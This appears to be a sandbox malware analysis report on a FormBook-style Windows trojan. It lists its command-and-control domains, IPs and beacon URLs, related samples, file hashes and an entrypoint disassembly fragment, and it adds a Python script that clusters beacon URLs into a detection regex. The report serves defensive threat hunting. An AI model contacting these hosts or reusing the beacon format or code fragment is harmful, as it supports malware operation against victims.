http://www.cochez.club/dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.extinctionbrews.com/dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh | 0% | Avira URL Cloud | safe
http://www.thenorthgoldline.com/dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.cindywillardrealtor.com/dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.vermogenswerte.com/dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
www.extinctionbrews.com/dy8g/ | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.aizaibali.com/ | 100% | Avira URL Cloud | malware
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh | 100% | Avira URL Cloud | malware
http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN | 100% | Avira URL Cloud | malware

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
extinctionbrews.com | 34.102.136.180 | true | false | - | unknown
wideawakemomma.com | 34.102.136.180 | true | false | - | unknown
vermogenswerte.com | 172.104.157.41 | true | true | - | unknown
www.aizaibali.com | 154.88.31.204 | true | true | - | unknown
cochez.club | 95.215.210.10 | true | true | - | unknown
www.garimpeirastore.online | 209.99.40.222 | true | true | - | unknown
melodezu.com | 64.227.87.162 | true | true | - | unknown
cindywillardrealtor.com | 34.102.136.180 | true | false | - | unknown
825610.parkingcrew.net | 75.2.81.221 | true | false | - | high
www.thenorthgoldline.com | unknown | unknown | true | - | unknown
www.boatrace-life04.net | unknown | unknown | true | - | unknown
www.melodezu.com | unknown | unknown | true | - | unknown
www.cochez.club | unknown | unknown | true | - | unknown
www.cindywillardrealtor.com | unknown | unknown | true | - | unknown
www.wideawakemomma.com | unknown | unknown | true | - | unknown
www.vermogenswerte.com | unknown | unknown | true | - | unknown
www.livegaming.store | unknown | unknown | true | - | unknown
www.extinctionbrews.com | unknown | unknown | true | - | unknown
www.saludflv.info | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.cochez.club/dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh | true | Avira URL Cloud: safe | unknown
http://www.extinctionbrews.com/dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh | false | Avira URL Cloud: safe | unknown
http://www.thenorthgoldline.com/dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh | true | Avira URL Cloud: safe | unknown
http://www.cindywillardrealtor.com/dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh | false | Avira URL Cloud: safe | unknown
http://www.vermogenswerte.com/dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh | true | Avira URL Cloud: safe | unknown
www.extinctionbrews.com/dy8g/ | true | Avira URL Cloud: safe | low
http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh | false | Avira URL Cloud: malware | unknown
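What makes the contacted URLs above useful to a hunter is not any single domain but the fact that every beacon shares one path (/dy8g/) and one parameter layout (i8PHMrf, then 5jLtOl) across otherwise unrelated hosts, while the parameter values change every time. The Python script below is an added example and is not part of the Joe Sandbox report: it takes the beacon URLs listed in this report, plus the truncated www.aizaibali.com string recovered from raserver.exe memory and the unrelated apache.org URL from the memory-strings table as a control, clusters them by path and query-parameter names, and derives a host-agnostic pattern that tolerates truncated strings. The function names and the min_hosts threshold are my own choices.

```python
"""Cluster FormBook-style C2 beacon URLs by shape and derive a host-agnostic pattern.

Added example, not part of the sandbox report. The URL list is constructed
from the report's contacted-URL and memory-string tables.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed input: URLs observed in this analysis, plus one benign control.
OBSERVED_URLS = [
    "http://www.cochez.club/dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh",
    "http://www.extinctionbrews.com/dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh",
    "http://www.thenorthgoldline.com/dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh",
    "http://www.cindywillardrealtor.com/dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh",
    "http://www.vermogenswerte.com/dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh",
    "http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh",
    # Truncated string recovered from raserver.exe memory: second parameter missing.
    "http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN",
    # Control: unrelated URL from the same report's memory strings, not a beacon.
    "http://www.apache.org/licenses/LICENSE-2.0",
]


def beacon_shape(url):
    """Return (path, tuple of query parameter names), or None without a query.

    Parameter values are ignored on purpose: they are per-victim encrypted
    blobs that differ on every request, so only the layout is stable."""
    parts = urlsplit(url)
    if not parts.query:
        return None
    names = tuple(name for name, _ in parse_qsl(parts.query, keep_blank_values=True))
    return parts.path, names


def cluster_by_shape(urls):
    """Group hostnames by (path, parameter-name tuple)."""
    clusters = {}
    for url in urls:
        shape = beacon_shape(url)
        if shape is None:
            continue
        clusters.setdefault(shape, []).append(urlsplit(url).hostname)
    return clusters


def dominant_shape(urls, min_hosts=3):
    """Shape seen on the most distinct hosts; None if fewer than min_hosts share it.

    The threshold stops a single odd URL from being promoted to an indicator."""
    clusters = cluster_by_shape(urls)
    best = max(clusters, key=lambda s: len(set(clusters[s])), default=None)
    if best is None or len(set(clusters[best])) < min_hosts:
        return None
    return best


def shape_regex(shape):
    """Host-agnostic regex for a shape: fixed path and first parameter name,
    later parameters optional so truncated memory strings still match."""
    path, names = shape
    first, rest = names[0], names[1:]
    pattern = r"^https?://[^/]+" + re.escape(path) + r"\?" + re.escape(first) + r"=[^&]*"
    for name in rest:
        pattern += r"(?:&" + re.escape(name) + r"=[^&]*)?"
    return re.compile(pattern + r"$")


def matching_hosts(urls, regex):
    """Sorted distinct hostnames whose URL matches the derived beacon pattern."""
    return sorted({urlsplit(u).hostname for u in urls if regex.match(u)})


if __name__ == "__main__":
    shape = dominant_shape(OBSERVED_URLS)
    rx = shape_regex(shape)
    print("dominant shape:", shape)
    print("pattern:", rx.pattern)
    for host in matching_hosts(OBSERVED_URLS, rx):
        print("C2 candidate:", host)
```

The derived pattern flags all seven beacon hosts, including the truncated www.aizaibali.com string, and ignores the apache.org control. The same shape-clustering idea carries over to proxy logs: a burst of requests to many unrelated hosts that all share one path and parameter layout is worth more than a reputation lookup on any one of the domains, most of which the URL scanners above still rate as safe.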

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404ref | raserver.exe, 0000000D.00000002.513072851.00000000052E2000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.aizaibali.com/ | raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN | raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
95.215.210.10 | cochez.club | Russian Federation | 49055 | NEWIT-ASRU | true
172.104.157.41 | vermogenswerte.com | United States | 63949 | LINODE-APLinodeLLCUS | true
34.102.136.180 | extinctionbrews.com | United States | 15169 | GOOGLEUS | false
75.2.81.221 | 825610.parkingcrew.net | United States | 16509 | AMAZON-02US | false
154.88.31.204 | www.aizaibali.com | Seychelles | 40065 | CNSERVERSUS | true

                                                                      General Information

                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                      Analysis ID:452687
                                                                      Start date:22.07.2021
                                                                      Start time:18:03:21
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:pMbPS8nCm1.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:23
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/0@13/5
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 29.3% (good quality ratio 25.4%)
                                                                      • Quality average: 71.1%
                                                                      • Quality standard deviation: 33.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.193.48, 23.35.236.56, 20.82.209.183, 23.216.77.132, 23.216.77.146, 13.107.4.50, 51.103.5.186, 40.112.88.60, 80.67.82.211, 80.67.82.235
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, Edge-Prod-FRA.env.au.au-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net
                                                                       • Not all processes were analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                       Match | Associated Sample Name | Detection | Context
                                                                       95.215.210.10 | QxnlprRUTx.exe | malicious | www.cochez.club/dy8g/?Jn=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKjmEwKzzqjxp&2dM8l=bXbDpfbx6FA04L
                                                                       95.215.210.10 | quote.exe | malicious | www.oilepp.club/sgs8/?5joX=g/kFtZKPlgxqAQoU+wlNBUIJLf9Fcx+iYtqxvXVhE+9z/b8eYGNe36RCp3BFC2pgwHcV&D2M8=n6Aht2thEVdHtFzP
                                                                       95.215.210.10 | RzLicilE0b.exe | malicious | www.cochez.club/dy8g/?cPwPC=GvDdgdCxmzC8AL&Jj8hf8=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKjmEwKzzqjxp
                                                                       95.215.210.10 | letterhead.exe | malicious | www.rapurp.club/epms/?Cj30v=9rJhur7HoF7lOxC&x4uDfZgH=K5/mSQXSr23x/w/wVuTeR0A48OUt6IqKG3U9if3kYnbI39O8+SeWAMufgZ7J/RGM/FJB
                                                                       95.215.210.10 | PO6543.exe | malicious | www.zirrema.club/arug/?kfLlf8=WePorOziRm3dT6K3hneQ6fmiCjwbDaqEtdfFV6ZB0ObBVUAf2E30+4A2y/BajiHRCQCm&Yf0=ybFLLTR8hZjhx2
                                                                       95.215.210.10 | DH7v8T4xFa.exe | malicious | www.ouitum.club/nsag/?r6A=oyuKyynVjO0A9ce0TXUJOkg+PRrvkOYQG7y0ZxIeGgkEVxubI4D8c/ZpyjqbTZI03xFO&rVIDm=GBODAlxxjbuxRT
                                                                       95.215.210.10 | ZTRADE0021.exe | malicious | www.deitey.club/i8rz/?9r4P-=1ysJ3lWopnxW9GefGIty5IYzVShJJI8DXw1o7bIqniwmmXQsizYOZMj1tVFT/eUIzFsn+AWcxA==&1bS=WHrpCdQ08
                                                                       95.215.210.10 | q5oRsfy1vk.exe | malicious | www.leteva.club/w8en/?jrQDTX=t8bLyeK0DI5vLwV8yQwzQWSFYhc1yG8ON0Rl7Rqkh6Hs61Z4hvVeNgM7YBsF6F3Pp/Tj&K2JxgH=Exop8hRXRdA
                                                                       95.215.210.10 | Sf6jgQc6Ww.exe | malicious | www.keboate.club/oean/?5j=UjPt&DvjTU=QSIVnL8HxXhFJqDnObQFTaTfjHXZPmA+lfnypz2XDw+CpSlLz9CtCX9/im7M/Rpd1AtY
                                                                       95.215.210.10 | btVnDhh5K7.exe | malicious | www.keboate.club/oean/?Tj=YvFHu&wxl=QSIVnL8HxXhFJqDnObQFTaTfjHXZPmA+lfnypz2XDw+CpSlLz9CtCX9/im7M/Rpd1AtY
                                                                       95.215.210.10 | bin.exe | malicious | www.codedad.club/oncs/?tXUd=WDabN1kLr0eeaEJi5hB0qY/SQqmTyVeMQxg3iiKOowrTZ05AQIKvczEBWaeH6gSgjhMc&2ddpC=ftxDHdNX
                                                                       95.215.210.10 | Order No. BCM190282.exe | malicious | www.gourgio.club/w8en/?rvR86T=5YwAZxfr8BO/v8TT5gfgL0uEKqiEK71WcuoEStVUpKXrZ2OiCHsQMJK9T6jPO8wO+q3l&1bw=L6Ahp0_8jf-htd6p
                                                                       95.215.210.10 | Shipping INVOICE-BL Shipment..exe | malicious | www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly
                                                                       172.104.157.41 | RzLicilE0b.exe | malicious | www.vermogenswerte.com/dy8g/?cPwPC=GvDdgdCxmzC8AL&Jj8hf8=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2LpAM6isw8Zs
                                                                       75.2.81.221 | PQMW0W5h3X.exe | malicious | www.thenorthgoldline.com/dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w==
                                                                       75.2.81.221 | Shipping Documents C1216.exe | malicious | www.helpwithgre.com/fhg5/?idFt5Lt8=2UtB8DcbqqUNdGGafXCP7IZK2b+ICtd8++zQoCDv+Hjw8z9Bnq28qASc6PfUd7Mbl5s7loQVOw==&TZ=EjUt0xR

                                                                      Domains

                                                                       Match | Associated Sample Name | Detection | Context
                                                                       www.aizaibali.com | v8kZUFgdD4.exe | malicious | 154.88.31.204
                                                                       www.aizaibali.com | QxnlprRUTx.exe | malicious | 154.88.31.204
                                                                       www.aizaibali.com | w3Qf2wBNX7.exe | malicious | 154.88.31.204
                                                                       825610.parkingcrew.net | PQMW0W5h3X.exe | malicious | 75.2.81.221
                                                                       825610.parkingcrew.net | Shipping Documents C1216.exe | malicious | 75.2.81.221
                                                                       825610.parkingcrew.net | 47DOC008699383837383 PDF.exe | malicious | 54.72.9.115
                                                                       825610.parkingcrew.net | 29SCAN 0750.exe | malicious | 54.72.9.115
                                                                       www.garimpeirastore.online | QxnlprRUTx.exe | malicious | 209.99.40.222
                                                                       www.garimpeirastore.online | seBe6bgLTw.exe | malicious | 209.99.40.222
                                                                       www.garimpeirastore.online | 0FKzNO1g3P.exe | malicious | 209.99.40.222

                                                                      ASN

                                                                       Match | Associated Sample Name | Detection | Context
                                                                       LINODE-APLinodeLLCUS | Gw6boin32F.exe | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | Swift-Payment_Details.xlsx | malicious | 173.255.194.134
                                                                       LINODE-APLinodeLLCUS | 2fZSExq7dm.exe | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | 9QFzJlxaTl.dll | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | CefN2XNyFi | malicious | 45.79.143.159
                                                                       LINODE-APLinodeLLCUS | lovemetertok.dll | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | Item_positions_receipt_564965.xlsm | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | Signed PEARLTECH contract and PO.exe | malicious | 173.255.194.134
                                                                       LINODE-APLinodeLLCUS | XfKsLIPLUu | malicious | 50.116.8.237
                                                                       LINODE-APLinodeLLCUS | Reciept 2868661.xlsb | malicious | 178.79.147.66
                                                                       LINODE-APLinodeLLCUS | nO9g6aIpZp.exe | malicious | 178.79.130.185
                                                                       LINODE-APLinodeLLCUS | zgMatT7LEs.exe | malicious | 66.175.218.106
                                                                       LINODE-APLinodeLLCUS | borderCurr.dll | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | triage_dropped_file.dll | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | vZksc78XID.dll | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | mormanti.exe | malicious | 66.228.49.173
                                                                       LINODE-APLinodeLLCUS | 6J08VVHWxd.dll | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | HocVKWxT9F.dll | malicious | 176.58.123.25
                                                                       LINODE-APLinodeLLCUS | deepRats.exe | malicious | 45.79.108.130
                                                                       NEWIT-ASRU | QxnlprRUTx.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | quote.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | RzLicilE0b.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | letterhead.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | PO6543.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | DH7v8T4xFa.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | ZTRADE0021.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | q5oRsfy1vk.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | Sf6jgQc6Ww.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | btVnDhh5K7.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | bin.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | Order No. BCM190282.exe | malicious | 95.215.210.10
                                                                       NEWIT-ASRU | Shipping INVOICE-BL Shipment..exe | malicious | 95.215.210.10

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.971119501388661
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:pMbPS8nCm1.exe
                                                                      File size:177067
                                                                      MD5:de87f1794377537dda721afd9137e491
                                                                      SHA1:3b0480a4afe176722d9b8cf6f9f9c9257b1d132f
                                                                      SHA256:b0a684c7dfc5a94e3dd2edcb1c706eae088ff9d701ec55f0adb1ae977e5e9081
                                                                      SHA512:7916fe93f72a025663540894ca5c7678e345870bc32e54af6224394b2d1bd3991adbf9097d0d8af67363fa4e3ae0ec00ab407b0a5a24ffec2652457420d4aa14
                                                                      SSDEEP:3072:vMWOOOOOOOOOOOOOOHQ47MB3Fvd3cvtS99ZwlRtlL79ZF5/CGnrN8pCcFOOZPJIZ:EWOOOOOOOOOOOOOOH9sxd3+S9CRtlhEE
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Wtz.Wtz.Wtz.^...Ztz.Wt{.Itz.^...Vtz.^...Vtz.RichWtz.................PE..L...q..`.....................................0....@

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x401000
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x60F8EC71 [Thu Jul 22 03:56:33 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:10de39a2884c15c1630de9015f14f501

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000678h
                                                                      mov byte ptr [ebp-00000290h], FFFFFFE9h
                                                                      mov byte ptr [ebp-0000028Fh], FFFFFF90h
                                                                      mov byte ptr [ebp-0000028Eh], 00000000h
                                                                      mov byte ptr [ebp-0000028Dh], 00000000h
                                                                      mov byte ptr [ebp-0000028Ch], 00000000h
                                                                      mov byte ptr [ebp-0000028Bh], 00000055h
                                                                      mov byte ptr [ebp-0000028Ah], FFFFFF8Bh
                                                                      mov byte ptr [ebp-00000289h], FFFFFFECh
                                                                      mov byte ptr [ebp-00000288h], 00000056h
                                                                      mov byte ptr [ebp-00000287h], FFFFFF8Bh
                                                                      mov byte ptr [ebp-00000286h], 00000075h
                                                                      mov byte ptr [ebp-00000285h], 00000008h
                                                                      mov byte ptr [ebp-00000284h], FFFFFFBAh
                                                                      mov byte ptr [ebp-00000283h], 00000073h
                                                                      mov byte ptr [ebp-00000282h], 00000014h
                                                                      mov byte ptr [ebp-00000281h], 00000000h
                                                                      mov byte ptr [ebp-00000280h], 00000000h
                                                                      mov byte ptr [ebp-0000027Fh], 00000057h
                                                                      mov byte ptr [ebp-0000027Eh], FFFFFFEBh
                                                                      mov byte ptr [ebp-0000027Dh], 0000000Eh
                                                                      mov byte ptr [ebp-0000027Ch], FFFFFF8Bh
                                                                      mov byte ptr [ebp-0000027Bh], FFFFFFCAh
                                                                      mov byte ptr [ebp-0000027Ah], FFFFFFD1h
                                                                      mov byte ptr [ebp-00000279h], FFFFFFE8h
